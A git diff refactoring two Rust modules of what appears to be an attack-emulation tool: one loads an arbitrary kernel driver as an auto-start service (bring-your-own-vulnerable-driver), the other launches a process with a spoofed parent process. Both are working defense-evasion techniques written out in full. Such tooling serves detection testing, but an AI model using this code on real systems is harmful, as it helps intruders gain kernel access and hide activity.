diff --git a/src/actions/drivers/byovd.rs b/src/actions/drivers/byovd.rs index 9ac8beb..fb75979 100644 --- a/src/actions/drivers/byovd.rs +++ b/src/actions/drivers/byovd.rs @@ -6,7 +6,7 @@ use crate::{actions::Runnable, windows::users::is_administrator}; use clap::Parser; use std::{error::Error, path::PathBuf}; use windows::{ - core::{Owned, Result as WindowsResult, HSTRING, PCWSTR}, + core::{Owned, HSTRING, PCWSTR}, Win32::System::Services::{ CreateServiceW, OpenSCManagerW, StartServiceW, SC_HANDLE, SC_MANAGER_ALL_ACCESS, SC_MANAGER_CREATE_SERVICE, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, SERVICE_KERNEL_DRIVER, @@ -23,44 +23,36 @@ pub struct Byovd { path: PathBuf, } -fn load_driver(name: &str, details: &str, path: &str) -> WindowsResult<()> { - unsafe { - let service_manager: Owned = Owned::new(OpenSCManagerW( - PCWSTR::null(), - PCWSTR::null(), - SC_MANAGER_CREATE_SERVICE, - )?); - - let service: Owned = Owned::new(CreateServiceW( - *service_manager, - &HSTRING::from(name), - &HSTRING::from(details), - SC_MANAGER_ALL_ACCESS, - SERVICE_KERNEL_DRIVER, - SERVICE_AUTO_START, - SERVICE_ERROR_IGNORE, - &HSTRING::from(path), - PCWSTR::null(), - None, - PCWSTR::null(), - PCWSTR::null(), - PCWSTR::null(), - )?); - - Ok(StartServiceW(*service, None)?) - } -} - impl Runnable for Byovd { fn run(&self) -> Result<(), Box> { if !is_administrator()? { return Ok(()); } - Ok(load_driver( - &self.internal, - &self.display, - self.path.to_str().unwrap(), - )?) + unsafe { + let service_manager: Owned = Owned::new(OpenSCManagerW( + PCWSTR::null(), + PCWSTR::null(), + SC_MANAGER_CREATE_SERVICE, + )?); + + let service: Owned = Owned::new(CreateServiceW( + *service_manager, + &HSTRING::from(self.internal.as_str()), + &HSTRING::from(self.display.as_str()), + SC_MANAGER_ALL_ACCESS, + SERVICE_KERNEL_DRIVER, + SERVICE_AUTO_START, + SERVICE_ERROR_IGNORE, + &HSTRING::from(self.path.to_str().unwrap()), + PCWSTR::null(), + None, + PCWSTR::null(), + PCWSTR::null(), + PCWSTR::null(), + )?); + + Ok(StartServiceW(*service, None)?) + } } } diff --git a/src/actions/processes/spoofing.rs b/src/actions/processes/spoofing.rs index dfe16b2..317667d 100644 --- a/src/actions/processes/spoofing.rs +++ b/src/actions/processes/spoofing.rs @@ -26,77 +26,76 @@ pub struct Spoofing { parent_executable: String, } -fn spoof(executable: &str, parent_pid: u32) -> Result<(), Box> { - let mut required_size: usize = 0; +impl Runnable for Spoofing { + fn run(&self) -> Result<(), Box> { + let mut required_size: usize = 0; - unsafe { - let _ = InitializeProcThreadAttributeList( - LPPROC_THREAD_ATTRIBUTE_LIST::default(), - 1, - 0, - &mut required_size, - ); - }; + unsafe { + let _ = InitializeProcThreadAttributeList( + LPPROC_THREAD_ATTRIBUTE_LIST::default(), + 1, + 0, + &mut required_size, + ); + }; - let mut attributes: Box<[u8]> = vec![0; required_size].into_boxed_slice(); - let attributes_list: Owned = unsafe { - Owned::new(LPPROC_THREAD_ATTRIBUTE_LIST( - attributes.as_mut_ptr() as *mut _ - )) - }; - let startup_informations: STARTUPINFOEXW = STARTUPINFOEXW { - StartupInfo: STARTUPINFOW { - cb: size_of::() as u32, - ..Default::default() - }, - lpAttributeList: *attributes_list, - }; + let mut attributes: Box<[u8]> = vec![0; required_size].into_boxed_slice(); + let attributes_list: Owned = unsafe { + Owned::new(LPPROC_THREAD_ATTRIBUTE_LIST( + attributes.as_mut_ptr() as *mut _ + )) + }; + let startup_informations: STARTUPINFOEXW = STARTUPINFOEXW { + StartupInfo: STARTUPINFOW { + cb: size_of::() as u32, + ..Default::default() + }, + lpAttributeList: *attributes_list, + }; - unsafe { - InitializeProcThreadAttributeList( - startup_informations.lpAttributeList, - 1, - 0, - &mut required_size, - )?; + unsafe { + InitializeProcThreadAttributeList( + startup_informations.lpAttributeList, + 1, + 0, + &mut required_size, + )?; - let mut parent_process: Owned = - Owned::new(OpenProcess(PROCESS_CREATE_PROCESS, false, parent_pid)?); - UpdateProcThreadAttribute( - startup_informations.lpAttributeList, - 0, - PROC_THREAD_ATTRIBUTE_PARENT_PROCESS as usize, - Some(&mut *parent_process as *mut _ as *mut _), - size_of::(), - None, - None, - )?; + let mut parent_process: Owned = Owned::new(OpenProcess( + PROCESS_CREATE_PROCESS, + false, + get_pid(self.parent_executable.as_str())?, + )?); + UpdateProcThreadAttribute( + startup_informations.lpAttributeList, + 0, + PROC_THREAD_ATTRIBUTE_PARENT_PROCESS as usize, + Some(&mut *parent_process as *mut _ as *mut _), + size_of::(), + None, + None, + )?; - CreateProcessW( - None, - PWSTR( - OsString::from(executable) - .encode_wide() - .chain(once(0)) - .collect::>() - .as_mut_ptr(), - ), - None, - None, - false, - EXTENDED_STARTUPINFO_PRESENT, - None, - None, - &startup_informations.StartupInfo, - &mut PROCESS_INFORMATION::default(), - )?; - }; + CreateProcessW( + None, + PWSTR( + OsString::from(self.executable.as_str()) + .encode_wide() + .chain(once(0)) + .collect::>() + .as_mut_ptr(), + ), + None, + None, + false, + EXTENDED_STARTUPINFO_PRESENT, + None, + None, + &startup_informations.StartupInfo, + &mut PROCESS_INFORMATION::default(), + )?; + }; - Ok(()) -} - -impl Runnable for Spoofing { - fn run(&self) -> Result<(), Box> { - Ok(spoof(&self.executable, get_pid(&self.parent_executable)?)?) + Ok(()) } }